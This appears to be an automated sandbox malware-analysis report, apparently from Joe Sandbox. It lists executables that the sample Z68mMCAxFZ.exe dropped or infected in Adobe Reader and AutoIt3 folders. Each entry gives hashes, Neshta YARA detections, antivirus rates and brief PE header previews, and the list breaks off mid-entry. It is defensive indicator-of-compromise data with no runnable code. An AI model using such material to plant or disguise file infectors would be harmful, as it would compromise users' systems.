                                                          SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                          SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                          SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.302303877870808
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                          MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                          SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                          SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                          SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.261294291615621
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                          MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                          SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                          SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                          SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 97%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.423139673646388
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                          MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                          SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                          SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                          SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.355719905315724
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                          MD5:A42467B5C21814776277B4CE3456D716
                                                          SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                          SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                          SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Metadefender, Detection: 91%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.228109838185618
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                          MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                          SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                          SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                          SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.26326337462311
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                          MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                          SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                          SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                          SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.079745714518026
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                          MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                          SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                          SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                          SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 94%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.352749197508949
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                          MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                          SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                          SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                          SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.395396839059979
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                          MD5:B4E63C549366CFCDA2363E35C197D41C
                                                          SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                          SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                          SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.509452568334581
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                          MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                          SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                          SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                          SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.476428579556002
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                          MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                          SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                          SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                          SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.520333669037674
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                          MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                          SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                          SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                          SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.481287941039048
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                          MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                          SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                          SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                          SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):7.2906774035349695
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                          MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                          SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                          SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                          SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.586052312714495
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                          MD5:934C8B78754C1FB79DF08EF114600899
                                                          SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                          SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                          SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.529393382316189
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                          MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                          SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                          SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
